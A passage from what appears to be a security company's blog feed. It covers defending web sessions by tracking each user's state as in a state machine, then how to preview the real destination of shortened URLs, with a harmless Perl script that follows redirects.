Hence, although the attacker would be able to retrieve the token and to perform several requests by discovering the state of the user, the application will identify the problem as soon as the user continues using the application and the states of the user and the attacker become desynchronised.

In this scenario, an attacker who successfully locates another suitable vulnerability in the web application (such as the XSS mentioned above) might be able to identify the state of the user, allowing them to retrieve the token and the state and to refresh the user’s web browser, changing the session token. By doing so, the attacker would be able to use the session, but the user will notice that something odd has happened, as their session will likely be terminated.

To avoid this situation, the application should protect against concurrent logins. Then, when the legitimate user logs in again, the application will detect the second session for the same user and will terminate both sessions.

A limitation of this solution is that legitimate users cannot have the application open in more than one tab of the same browser, because each tab would be in a different state, causing the application to identify the scenario as a possible attack and terminate an otherwise legitimate session. The browser’s navigation buttons (back and forward) would cause the same problem, because the user could change between states on the client side, “bypassing” the control of the web application.

In order to implement this, the server-side application would need to be designed like a state machine in which all the relationships between the states are defined. The application will therefore need to store the current state of the user inside their session and to check that every request comes from the current state and is addressed to one of the states reachable from it.
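Such a transition table could be sketched as follows, using the page names from the example diagram (the structure and function name are illustrative, not from any real application):

```javascript
// Allowed transitions from the flow diagram: 1 -> 2 -> 3 -> 1,
// with "logout" reachable from any private page.
const allowedTransitions = {
    'login':          ['private-page-1'],
    'private-page-1': ['private-page-2', 'logout'],
    'private-page-2': ['private-page-3', 'logout'],
    'private-page-3': ['private-page-1', 'logout']
};

// Returns true only if the requested state is reachable from the
// state currently stored in the session.
function isValidTransition(currentState, requestedState) {
    const next = allowedTransitions[currentState];
    return next !== undefined && next.indexOf(requestedState) !== -1;
}
```

Any request whose target state fails this check would be treated as suspicious and the session terminated.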

The tokens used to mitigate Cross-site Request Forgery (CSRF) attacks could be used to check the state the user is coming from. If the token received by the application with each request matches the token previously sent to the user, the user is coming from a valid state. One of the problems with this approach is that all requests would need to include the CSRF token (including GET requests) and most libraries do not support this check for GET requests. Another problem is that the solution implemented by many frameworks uses one unique token which is sent throughout the application but which does not change between requests. In that case, it would not be possible to differentiate between two different states.

A different approach could be to check the HTTP “Referer” header of each request. In this case, the state could be represented by the URL the user is navigating from (remember that this header cannot be trivially manipulated using JavaScript: only the web browser has access to it). Alternatively, instead of the “Referer” header, an extra hidden field could be added to each form and link which saves the state and preserves it between requests.

Each approach has its benefits and its problems, so a mixed solution would probably be better: using the CSRF token to preserve the valid states between requests and checking the “Referer” HTTP header to verify previous states.

So, summarising:

  • Web session security can be improved by treating the web application as a state machine and checking the state of each user on each request.
  • Advantages: this approach prevents and/or complicates attacks on the session, such as session hijacking. Furthermore, it can complicate the use of guessable/default accounts when another user is already using them, because concurrent sessions must be avoided.
  • Disadvantages: users cannot use the application in different tabs, and interaction with it is limited to the actions offered on each page, ruling out the use of the browser’s navigation buttons.
  • Two possible implementations consist of checking the “Referer” HTTP header and/or the CSRF token sent within each request.

In the next post, I will address another problem relating to web session management: how to identify when a user is no longer using the application, and how to close the session as soon as possible.

URL shorteners: What link are you really clicking? https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/ https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/#comments Wed, 08 Jan 2014 06:40:41 +0000 https://labs.portcullis.co.uk/?p=2705

The post URL shorteners: What link are you really clicking? appeared first on Portcullis Labs.

URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been wary of shortened links and decided I’d take a look at how you can check what it is you’re actually clicking on.

It’s worth noting that there are numerous browser extensions that will attempt to lengthen short URLs in-situ. While this probably works well most of the time, it could be open to exploitation (if the extension is coded badly) or subversion. One piece of functionality I’ve seen in such an extension was to replace the link with the metadata title of the page. This doesn’t really help if the link leads you to a convincing-looking phishing site, complete with fake metadata.

I’ve picked out a sample of what seem to be the most popular shortening services. They are (in no particular order):

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • tiny.cc
  • ow.ly

I’ve come up with this list as a result of a quick search and those I’ve had previous experience with. There are a couple of notable exclusions from the list, such as t.co and fb.me, the services run by Twitter and Facebook respectively. I’ve excluded these (as well as others) as they’re only used by the services themselves.

Twitter’s shortener, t.co, seems to be accessible only when using Twitter and doesn’t provide any kind of dedicated front-end to view information for a given link. It does, however, replace some of the text in-line and provides the original URL in the link title, which you can see by hovering over the URL.
Facebook’s version seems a little… undocumented. I couldn’t find a great deal of information on it, other than that it seems to be used largely for mobile users and (from what little I checked) is only used for linking back to Facebook. One feature I did find, however, is that it can be used to link to any Facebook page given its alias. For example, fb.me/PortcullisCSL.

I’ve also only chosen services which are free to use and for obvious reasons I’m excluding any that you can create using your own domain (Coke has one for example – cokeurl.com).

For this post, we’re going to use https://labs.portcullis.co.uk as our long URL to put through the shorteners.

Here’s a list of how our shortened links come out and the associated ways of previewing the actual destination:

Service      Short link                  Preview link
bit.ly       http://bit.ly/2cx5kA        http://bit.ly/2cx5kA+
tinyurl.com  http://tinyurl.com/nt79ln4  http://preview.tinyurl.com/nt79ln4
goo.gl       http://goo.gl/cgc0Wb        http://goo.gl/#analytics/goo.gl/cgc0Wb/all_time
is.gd        http://is.gd/ObGfiX         http://is.gd/ObGfiX-
tiny.cc      http://tiny.cc/43z67w       http://tiny.cc/43z67w~
ow.ly        http://ow.ly/rObWZ          (couldn’t find a way to expand the URL)

In summary: bit.ly, is.gd and tiny.cc all offer a nice simple way of taking a look; you just have to add a character to the end (provided you pick the right one). Google’s service seems the most complicated, requiring knowledge of the correct runes, and I couldn’t find a way to preview ow.ly at all.
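For the three services with a simple suffix trick, the lookup can be captured in a few lines (a sketch based purely on the table above; the helper name is mine):

```javascript
// Suffix that turns a short link into its preview page, per the
// table above (only services with a simple one-character trick).
const previewSuffix = {
    'bit.ly': '+',
    'is.gd': '-',
    'tiny.cc': '~'
};

// Returns the preview URL, or null when the service has no
// simple suffix-based preview (e.g. ow.ly).
function previewUrl(shortUrl) {
    const host = shortUrl.replace(/^https?:\/\//, '').split('/')[0];
    const suffix = previewSuffix[host];
    return suffix === undefined ? null : shortUrl + suffix;
}
```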

When writing this post, I was pointed at a bit of quick Perl that Tim wrote a little while ago to assist in a test which will follow a short link and print out each redirect it encounters along the way. This is particularly useful if your chosen link leads you to yet another URL shortener service.

#!/usr/bin/perl

use strict;
use LWP;
use File::Basename;

my $url;
my $redirectflag;
my $httphandle;
my $requesthandle;
my $responsehandle;

sub usage {
        die "usage: " . basename($0) . " <url>";
}

if (@ARGV != 1) {
        usage();
}
$url = shift;
$httphandle = LWP::UserAgent->new(max_redirect => 0);
$httphandle->agent("Mozilla/5.0 (compatible; resolveurl.pl 0.1)");
$redirectflag = 1;
while ($redirectflag == 1) {
        $redirectflag = 0;
        $requesthandle = HTTP::Request->new(HEAD => $url);
        $responsehandle = $httphandle->request($requesthandle);
        if ($responsehandle->is_redirect) {
                $url = $responsehandle->header("location");
                print $url . "\n";
                $redirectflag = 1;
        }
}

Lastly, I’ve decided to give a quick mention to adf.ly, which was pointed out to me by a colleague. This is a service for presenting ads before sending users on to the end URL. From a quick look, there didn’t appear to be any way to preview the URL you were being sent to. Given that following one of their links will present you with a third-party ad, this could have its own implications. But that’s for another post.

